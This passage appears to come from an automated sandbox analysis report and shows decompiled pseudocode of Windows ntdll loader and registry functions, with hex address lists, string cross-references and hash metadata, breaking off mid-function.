                                                    0x04b58974
                                                    0x00000000
                                                    0x04b5897a
                                                    0x04b5897a
                                                    0x04b5897d
                                                    0x00000000
                                                    0x04b58983
                                                    0x04ba9c65
                                                    0x04ba9c6d
                                                    0x04ba9c72
                                                    0x04ba9c75
                                                    0x04ba9c75
                                                    0x04ba9c82
                                                    0x04ba9c86
                                                    0x04ba9c87
                                                    0x04ba9c88
                                                    0x04ba9c89
                                                    0x04ba9c8c
                                                    0x04ba9c90
                                                    0x04ba9c95
                                                    0x04ba9c97
                                                    0x04ba9ca0
                                                    0x04ba9ca3
                                                    0x04ba9ca9
                                                    0x04ba9ca9
                                                    0x00000000
                                                    0x04ba9ca9
                                                    0x04ba9ca3
                                                    0x00000000
                                                    0x04ba9c97
                                                    0x04b5897d
                                                    0x00000000
                                                    0x04b58974
                                                    0x04b58988
                                                    0x04b58992
                                                    0x04b58996
                                                    0x00000000
                                                    0x04b58996
                                                    0x04b5894c
                                                    0x00000000
                                                    0x04b58870
                                                    0x04b5887b
                                                    0x04b5887d
                                                    0x04b5887f
                                                    0x04b58881
                                                    0x04b58884
                                                    0x04b58884
                                                    0x04b58886
                                                    0x04b58889
                                                    0x04b5888c
                                                    0x04b5888e
                                                    0x04b58891
                                                    0x04b58891
                                                    0x04b58898
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5889a
                                                    0x04b5889b
                                                    0x04b5889e
                                                    0x00000000
                                                    0x00000000
                                                    0x04b588a0
                                                    0x04b588a8
                                                    0x04b588b0
                                                    0x04b588b2
                                                    0x04b588d3
                                                    0x04b588d5
                                                    0x00000000
                                                    0x04b588d7
                                                    0x04b588db
                                                    0x04b588dc
                                                    0x04b588e0
                                                    0x04b588e8
                                                    0x04b588ee
                                                    0x04b588f0
                                                    0x04b588f3
                                                    0x04b588fc
                                                    0x04b58901
                                                    0x04b58906
                                                    0x04b5890c
                                                    0x04b5890c
                                                    0x04b5890f
                                                    0x04b58916
                                                    0x04b58917
                                                    0x04b58918
                                                    0x04b58919
                                                    0x04b5891a
                                                    0x04b5891f
                                                    0x04b58921
                                                    0x04ba9c52
                                                    0x04ba9c55
                                                    0x04ba9c5b
                                                    0x04ba9cac
                                                    0x04ba9cc0
                                                    0x04ba9cc0
                                                    0x04ba9c55
                                                    0x04b58927
                                                    0x04b58927
                                                    0x04b5892f
                                                    0x04b58933
                                                    0x00000000
                                                    0x04b588f5
                                                    0x04b588f5
                                                    0x00000000
                                                    0x04b588f7
                                                    0x04b588f7
                                                    0x04b588fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b588fa
                                                    0x04b588f5
                                                    0x04b588f3
                                                    0x00000000
                                                    0x04b588d5
                                                    0x00000000
                                                    0x04b588b2
                                                    0x04b588c9
                                                    0x00000000
                                                    0x04b588c9
                                                    0x04b5887f
                                                    0x04b5886a
                                                    0x04b58857
                                                    0x04b58852
                                                    0x04b588bf
                                                    0x04b588bf
                                                    0x04b587aa
                                                    0x04b587ad
                                                    0x04b587ae
                                                    0x04b587b4
                                                    0x04b587b5
                                                    0x04b587b6
                                                    0x04b587b8
                                                    0x04b587bd
                                                    0x04b587c1
                                                    0x04b587f4
                                                    0x04b587fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b587c1
                                                    0x00000000

                                                    Strings
                                                    • LdrpDoPostSnapWork, xrefs: 04BA9C1E
                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04BA9C18
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 04BA9C28
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 0-1948996284
                                                    • Opcode ID: a5927e6a5c1f532ca19049b8190d0cb4dd3c8853c0b94df57d0f2f11260a4829
                                                    • Instruction ID: 0c0ba3e81fd2bd00979b066c4bb3860b8d8d16f641782230eba99c2de836b672
                                                    • Opcode Fuzzy Hash: a5927e6a5c1f532ca19049b8190d0cb4dd3c8853c0b94df57d0f2f11260a4829
                                                    • Instruction Fuzzy Hash: 4591C071A00616ABEF18EF59C481BBAB3B5FF44355B1445E9ED05AB260E730FD21CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 98%
                                                    			E04B57E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                    				char _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				char _v24;
                                                    				signed int _t73;
                                                    				void* _t77;
                                                    				char* _t82;
                                                    				char* _t87;
                                                    				signed char* _t97;
                                                    				signed char _t102;
                                                    				intOrPtr _t107;
                                                    				signed char* _t108;
                                                    				intOrPtr _t112;
                                                    				intOrPtr _t124;
                                                    				intOrPtr _t125;
                                                    				intOrPtr _t126;
                                                    
                                                    				_t107 = __edx;
                                                    				_v12 = __ecx;
                                                    				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                    				_t124 = 0;
                                                    				_v20 = __edx;
                                                    				if(E04B5CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                    					_t112 = _v8;
                                                    				} else {
                                                    					_t112 = 0;
                                                    					_v8 = 0;
                                                    				}
                                                    				if(_t112 != 0) {
                                                    					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                    						_t124 = 0xc000007b;
                                                    						goto L8;
                                                    					}
                                                    					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                    					 *(_t125 + 0x34) = _t73;
                                                    					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                    						goto L3;
                                                    					}
                                                    					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                    					_t124 = E04B4C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                    					if(_t124 < 0) {
                                                    						goto L8;
                                                    					} else {
                                                    						goto L3;
                                                    					}
                                                    				} else {
                                                    					L3:
                                                    					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                    						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                    						L8:
                                                    						return _t124;
                                                    					}
                                                    					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                    						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                    							goto L5;
                                                    						}
                                                    						_t102 =  *0x4c35780; // 0x0
                                                    						if((_t102 & 0x00000003) != 0) {
                                                    							E04BC5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                    							_t102 =  *0x4c35780; // 0x0
                                                    						}
                                                    						if((_t102 & 0x00000010) != 0) {
                                                    							asm("int3");
                                                    						}
                                                    						_t124 = 0xc0000428;
                                                    						goto L8;
                                                    					}
                                                    					L5:
                                                    					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                    						goto L8;
                                                    					}
                                                    					_t77 = _a4 - 0x40000003;
                                                    					if(_t77 == 0 || _t77 == 0x33) {
                                                    						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                    						if(E04B67D50() != 0) {
                                                    							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                    						} else {
                                                    							_t82 = 0x7ffe0384;
                                                    						}
                                                    						_t108 = 0x7ffe0385;
                                                    						if( *_t82 != 0) {
                                                    							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                    								if(E04B67D50() == 0) {
                                                    									_t97 = 0x7ffe0385;
                                                    								} else {
                                                    									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                    								}
                                                    								if(( *_t97 & 0x00000020) != 0) {
                                                    									E04BC7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                    								}
                                                    							}
                                                    						}
                                                    						if(_a4 != 0x40000003) {
                                                    							L14:
                                                    							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                    							if(E04B67D50() != 0) {
                                                    								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                    							} else {
                                                    								_t87 = 0x7ffe0384;
                                                    							}
                                                    							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                    								if(E04B67D50() != 0) {
                                                    									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                    								}
                                                    								if(( *_t108 & 0x00000020) != 0) {
                                                    									E04BC7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                    								}
                                                    							}
                                                    							goto L8;
                                                    						} else {
                                                    							_v16 = _t125 + 0x24;
                                                    							_t124 = E04B7A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                    							if(_t124 < 0) {
                                                    								E04B4B1E1(_t124, 0x1490, 0, _v16);
                                                    								goto L8;
                                                    							}
                                                    							goto L14;
                                                    						}
                                                    					} else {
                                                    						goto L8;
                                                    					}
                                                    				}
                                                    			}

                                                    Strings
                                                    • minkernel\ntdll\ldrmap.c, xrefs: 04BA98A2
                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 04BA9891
                                                    • LdrpCompleteMapModule, xrefs: 04BA9898
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                    • API String ID: 0-1676968949
                                                    • Opcode ID: 5fd141a31f38451deeaf6d71274b9e77009f29075a4f79dae815245bad2aa294
                                                    • Instruction ID: 1fe62f07b4c02ff86600e83103d74f5bb9d88f21bb4e48dc9cd533e4a8663fb3
                                                    • Opcode Fuzzy Hash: 5fd141a31f38451deeaf6d71274b9e77009f29075a4f79dae815245bad2aa294
                                                    • Instruction Fuzzy Hash: F451EE71704741ABEB21CB68C984B2AFBA8EB04758F0409D9ED559B6E1EB34FD00DB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E04B4E620(void* __ecx, short* __edx, short* _a4) {
                                                    				char _v16;
                                                    				char _v20;
                                                    				intOrPtr _v24;
                                                    				char* _v28;
                                                    				char _v32;
                                                    				char _v36;
                                                    				char _v44;
                                                    				signed int _v48;
                                                    				intOrPtr _v52;
                                                    				void* _v56;
                                                    				void* _v60;
                                                    				char _v64;
                                                    				void* _v68;
                                                    				void* _v76;
                                                    				void* _v84;
                                                    				signed int _t59;
                                                    				signed int _t74;
                                                    				signed short* _t75;
                                                    				signed int _t76;
                                                    				signed short* _t78;
                                                    				signed int _t83;
                                                    				short* _t93;
                                                    				signed short* _t94;
                                                    				short* _t96;
                                                    				void* _t97;
                                                    				signed int _t99;
                                                    				void* _t101;
                                                    				void* _t102;
                                                    
                                                    				_t80 = __ecx;
                                                    				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                    				_t96 = __edx;
                                                    				_v44 = __edx;
                                                    				_t78 = 0;
                                                    				_v56 = 0;
                                                    				if(__ecx == 0 || __edx == 0) {
                                                    					L28:
                                                    					_t97 = 0xc000000d;
                                                    				} else {
                                                    					_t93 = _a4;
                                                    					if(_t93 == 0) {
                                                    						goto L28;
                                                    					}
                                                    					_t78 = E04B4F358(__ecx, 0xac);
                                                    					if(_t78 == 0) {
                                                    						_t97 = 0xc0000017;
                                                    						L6:
                                                    						if(_v56 != 0) {
                                                    							_push(_v56);
                                                    							E04B895D0();
                                                    						}
                                                    						if(_t78 != 0) {
                                                    							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                    						}
                                                    						return _t97;
                                                    					}
                                                    					E04B8FA60(_t78, 0, 0x158);
                                                    					_v48 = _v48 & 0x00000000;
                                                    					_t102 = _t101 + 0xc;
                                                    					 *_t96 = 0;
                                                    					 *_t93 = 0;
                                                    					E04B8BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                    					_v36 = 0x18;
                                                    					_v28 =  &_v44;
                                                    					_v64 = 0;
                                                    					_push( &_v36);
                                                    					_push(0x20019);
                                                    					_v32 = 0;
                                                    					_push( &_v64);
                                                    					_v24 = 0x40;
                                                    					_v20 = 0;
                                                    					_v16 = 0;
                                                    					_t97 = E04B89600();
                                                    					if(_t97 < 0) {
                                                    						goto L6;
                                                    					}
                                                    					E04B8BB40(0,  &_v36, L"InstallLanguageFallback");
                                                    					_push(0);
                                                    					_v48 = 4;
                                                    					_t97 = L04B4F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                    					if(_t97 >= 0) {
                                                    						if(_v52 != 1) {
                                                    							L17:
                                                    							_t97 = 0xc0000001;
                                                    							goto L6;
                                                    						}
                                                    						_t59 =  *_t78 & 0x0000ffff;
                                                    						_t94 = _t78;
                                                    						_t83 = _t59;
                                                    						if(_t59 == 0) {
                                                    							L19:
                                                    							if(_t83 == 0) {
                                                    								L23:
                                                    								E04B8BB40(_t83, _t102 + 0x24, _t78);
                                                    								if(L04B543C0( &_v48,  &_v64) == 0) {
                                                    									goto L17;
                                                    								}
                                                    								_t84 = _v48;
                                                    								 *_v48 = _v56;
                                                    								if( *_t94 != 0) {
                                                    									E04B8BB40(_t84, _t102 + 0x24, _t94);
                                                    									if(L04B543C0( &_v48,  &_v64) != 0) {
                                                    										 *_a4 = _v56;
                                                    									} else {
                                                    										_t97 = 0xc0000001;
                                                    										 *_v48 = 0;
                                                    									}
                                                    								}
                                                    								goto L6;
                                                    							}
                                                    							_t83 = _t83 & 0x0000ffff;
                                                    							while(_t83 == 0x20) {
                                                    								_t94 =  &(_t94[1]);
                                                    								_t74 =  *_t94 & 0x0000ffff;
                                                    								_t83 = _t74;
                                                    								if(_t74 != 0) {
                                                    									continue;
                                                    								}
                                                    								goto L23;
                                                    							}
                                                    							goto L23;
                                                    						} else {
                                                    							goto L14;
                                                    						}
                                                    						while(1) {
                                                    							L14:
                                                    							_t27 =  &(_t94[1]); // 0x2
                                                    							_t75 = _t27;
                                                    							if(_t83 == 0x2c) {
                                                    								break;
                                                    							}
                                                    							_t94 = _t75;
                                                    							_t76 =  *_t94 & 0x0000ffff;
                                                    							_t83 = _t76;
                                                    							if(_t76 != 0) {
                                                    								continue;
                                                    							}
                                                    							goto L23;
                                                    						}
                                                    						 *_t94 = 0;
                                                    						_t94 = _t75;
                                                    						_t83 =  *_t75 & 0x0000ffff;
                                                    						goto L19;
                                                    					}
                                                    				}
                                                    			}


                                                    Strings
                                                    • InstallLanguageFallback, xrefs: 04B4E6DB
                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04B4E68C
                                                    • @, xrefs: 04B4E6C0
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                    • API String ID: 0-1757540487
                                                    • Opcode ID: 28feeca173b06a779d25ccd51a5dc330e5e9e862f066e9e880dacc751a87203c
                                                    • Instruction ID: c2fa254ebc3a82507a1be5b1fb2869801a91d693ad80b371011ced024a1664c9
                                                    • Opcode Fuzzy Hash: 28feeca173b06a779d25ccd51a5dc330e5e9e862f066e9e880dacc751a87203c
                                                    • Instruction Fuzzy Hash: 26516E72508355ABD724DF68C440ABBB3E8FF88714F0509AEF98597250FB34EA14C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 77%
                                                    			E04BC51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				signed short* _t63;
                                                    				signed int _t64;
                                                    				signed int _t65;
                                                    				signed int _t67;
                                                    				intOrPtr _t74;
                                                    				intOrPtr _t84;
                                                    				intOrPtr _t88;
                                                    				intOrPtr _t94;
                                                    				void* _t100;
                                                    				void* _t103;
                                                    				intOrPtr _t105;
                                                    				signed int _t106;
                                                    				short* _t108;
                                                    				signed int _t110;
                                                    				signed int _t113;
                                                    				signed int* _t115;
                                                    				signed short* _t117;
                                                    				void* _t118;
                                                    				void* _t119;
                                                    
                                                    				_push(0x80);
                                                    				_push(0x4c205f0);
                                                    				E04B9D0E8(__ebx, __edi, __esi);
                                                    				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                    				_t115 =  *(_t118 + 0xc);
                                                    				 *(_t118 - 0x7c) = _t115;
                                                    				 *((char*)(_t118 - 0x65)) = 0;
                                                    				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                    				_t113 = 0;
                                                    				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                    				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                    				_t100 = __ecx;
                                                    				if(_t100 == 0) {
                                                    					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                    					E04B5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                    					 *((char*)(_t118 - 0x65)) = 1;
                                                    					_t63 =  *(_t118 - 0x90);
                                                    					_t101 = _t63[2];
                                                    					_t64 =  *_t63 & 0x0000ffff;
                                                    					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                    					L20:
                                                    					_t65 = _t64 >> 1;
                                                    					L21:
                                                    					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                    					if(_t108 == 0) {
                                                    						L27:
                                                    						 *_t115 = _t65 + 1;
                                                    						_t67 = 0xc0000023;
                                                    						L28:
                                                    						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                    						L29:
                                                    						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                    						E04BC53CA(0);
                                                    						return E04B9D130(0, _t113, _t115);
                                                    					}
                                                    					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                    						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                    							 *_t108 = 0;
                                                    						}
                                                    						goto L27;
                                                    					}
                                                    					 *_t115 = _t65;
                                                    					_t115 = _t65 + _t65;
                                                    					E04B8F3E0(_t108, _t101, _t115);
                                                    					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                    					_t67 = 0;
                                                    					goto L28;
                                                    				}
                                                    				_t103 = _t100 - 1;
                                                    				if(_t103 == 0) {
                                                    					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                    					_t74 = E04B63690(1, _t117, 0x4b21810, _t118 - 0x74);
                                                    					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                    					_t101 = _t117[2];
                                                    					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                    					if(_t74 < 0) {
                                                    						_t64 =  *_t117 & 0x0000ffff;
                                                    						_t115 =  *(_t118 - 0x7c);
                                                    						goto L20;
                                                    					}
                                                    					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                    					_t115 =  *(_t118 - 0x7c);
                                                    					goto L21;
                                                    				}
                                                    				if(_t103 == 1) {
                                                    					_t105 = 4;
                                                    					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                    					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                    					_push(_t118 - 0x70);
                                                    					_push(0);
                                                    					_push(0);
                                                    					_push(_t105);
                                                    					_push(_t118 - 0x78);
                                                    					_push(0x6b);
                                                    					 *((intOrPtr*)(_t118 - 0x64)) = E04B8AA90();
                                                    					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                    					_t113 = L04B64620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                    					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                    					if(_t113 != 0) {
                                                    						_push(_t118 - 0x70);
                                                    						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                    						_push(_t113);
                                                    						_push(4);
                                                    						_push(_t118 - 0x78);
                                                    						_push(0x6b);
                                                    						_t84 = E04B8AA90();
                                                    						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                    						if(_t84 < 0) {
                                                    							goto L29;
                                                    						}
                                                    						_t110 = 0;
                                                    						_t106 = 0;
                                                    						while(1) {
                                                    							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                    							 *(_t118 - 0x88) = _t106;
                                                    							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                    								break;
                                                    							}
                                                    							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                    							_t106 = _t106 + 1;
                                                    						}
                                                    						_t88 = E04BC500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                    						_t119 = _t119 + 0x1c;
                                                    						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                    						if(_t88 < 0) {
                                                    							goto L29;
                                                    						}
                                                    						_t101 = _t118 - 0x3c;
                                                    						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                    						goto L21;
                                                    					}
                                                    					_t67 = 0xc0000017;
                                                    					goto L28;
                                                    				}
                                                    				_push(0);
                                                    				_push(0x20);
                                                    				_push(_t118 - 0x60);
                                                    				_push(0x5a);
                                                    				_t94 = E04B89860();
                                                    				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                    				if(_t94 < 0) {
                                                    					goto L29;
                                                    				}
                                                    				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                    					_t101 = L"Legacy";
                                                    					_push(6);
                                                    				} else {
                                                    					_t101 = L"UEFI";
                                                    					_push(4);
                                                    				}
                                                    				_pop(_t65);
                                                    				goto L21;
                                                    			}

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: 0ecde45b68ec624efe7f1e83dd751593b163b8d4534ca619e4026d91c8619925
                                                    • Instruction ID: 2513f630226f081f7e2663e11b8cc324a707f4139cf08aacad0ad7431ef90c24
                                                    • Opcode Fuzzy Hash: 0ecde45b68ec624efe7f1e83dd751593b163b8d4534ca619e4026d91c8619925
                                                    • Instruction Fuzzy Hash: A6518371E00629AFDB24DFA8C990BADBBF8FF84704F5440ADE55AEB251D670B900CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 78%
                                                    			E04B4B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                    				signed int _t65;
                                                    				signed short _t69;
                                                    				intOrPtr _t70;
                                                    				signed short _t85;
                                                    				void* _t86;
                                                    				signed short _t89;
                                                    				signed short _t91;
                                                    				intOrPtr _t92;
                                                    				intOrPtr _t97;
                                                    				intOrPtr* _t98;
                                                    				signed short _t99;
                                                    				signed short _t101;
                                                    				void* _t102;
                                                    				char* _t103;
                                                    				signed short _t104;
                                                    				intOrPtr* _t110;
                                                    				void* _t111;
                                                    				void* _t114;
                                                    				intOrPtr* _t115;
                                                    
                                                    				_t109 = __esi;
                                                    				_t108 = __edi;
                                                    				_t106 = __edx;
                                                    				_t95 = __ebx;
                                                    				_push(0x90);
                                                    				_push(0x4c1f7a8);
                                                    				E04B9D0E8(__ebx, __edi, __esi);
                                                    				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                    				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                    				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                    				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                    				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                    				if(__edx == 0xffffffff) {
                                                    					L6:
                                                    					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                    					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                    					__eflags = _t65 & 0x00000002;
                                                    					if((_t65 & 0x00000002) != 0) {
                                                    						L3:
                                                    						L4:
                                                    						return E04B9D130(_t95, _t108, _t109);
                                                    					}
                                                    					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                    					_t108 = 0;
                                                    					_t109 = 0;
                                                    					_t95 = 0;
                                                    					__eflags = 0;
                                                    					while(1) {
                                                    						__eflags = _t95 - 0x200;
                                                    						if(_t95 >= 0x200) {
                                                    							break;
                                                    						}
                                                    						E04B8D000(0x80);
                                                    						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                    						_t108 = _t115;
                                                    						_t95 = _t95 - 0xffffff80;
                                                    						_t17 = _t114 - 4;
                                                    						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                    						__eflags =  *_t17;
                                                    						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                    						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                    						_t102 = _t110 + 1;
                                                    						do {
                                                    							_t85 =  *_t110;
                                                    							_t110 = _t110 + 1;
                                                    							__eflags = _t85;
                                                    						} while (_t85 != 0);
                                                    						_t111 = _t110 - _t102;
                                                    						_t21 = _t95 - 1; // -129
                                                    						_t86 = _t21;
                                                    						__eflags = _t111 - _t86;
                                                    						if(_t111 > _t86) {
                                                    							_t111 = _t86;
                                                    						}
                                                    						E04B8F3E0(_t108, _t106, _t111);
                                                    						_t115 = _t115 + 0xc;
                                                    						_t103 = _t111 + _t108;
                                                    						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                    						_t89 = _t95 - _t111;
                                                    						__eflags = _t89;
                                                    						_push(0);
                                                    						if(_t89 == 0) {
                                                    							L15:
                                                    							_t109 = 0xc000000d;
                                                    							goto L16;
                                                    						} else {
                                                    							__eflags = _t89 - 0x7fffffff;
                                                    							if(_t89 <= 0x7fffffff) {
                                                    								L16:
                                                    								 *(_t114 - 0x94) = _t109;
                                                    								__eflags = _t109;
                                                    								if(_t109 < 0) {
                                                    									__eflags = _t89;
                                                    									if(_t89 != 0) {
                                                    										 *_t103 = 0;
                                                    									}
                                                    									L26:
                                                    									 *(_t114 - 0xa0) = _t109;
                                                    									 *(_t114 - 4) = 0xfffffffe;
                                                    									__eflags = _t109;
                                                    									if(_t109 >= 0) {
                                                    										L31:
                                                    										_t98 = _t108;
                                                    										_t39 = _t98 + 1; // 0x1
                                                    										_t106 = _t39;
                                                    										do {
                                                    											_t69 =  *_t98;
                                                    											_t98 = _t98 + 1;
                                                    											__eflags = _t69;
                                                    										} while (_t69 != 0);
                                                    										_t99 = _t98 - _t106;
                                                    										__eflags = _t99;
                                                    										L34:
                                                    										_t70 =  *[fs:0x30];
                                                    										__eflags =  *((char*)(_t70 + 2));
                                                    										if( *((char*)(_t70 + 2)) != 0) {
                                                    											L40:
                                                    											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                    											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                    											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                    											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                    											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                    											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                    											 *(_t114 - 4) = 1;
                                                    											_push(_t114 - 0x74);
                                                    											L04B9DEF0(_t99, _t106);
                                                    											 *(_t114 - 4) = 0xfffffffe;
                                                    											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                    											goto L3;
                                                    										}
                                                    										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                    										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                    											goto L40;
                                                    										}
                                                    										_push( *((intOrPtr*)(_t114 + 8)));
                                                    										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                    										_push(_t99 & 0x0000ffff);
                                                    										_push(_t108);
                                                    										_push(1);
                                                    										_t101 = E04B8B280();
                                                    										__eflags =  *((char*)(_t114 + 0x14)) - 1;
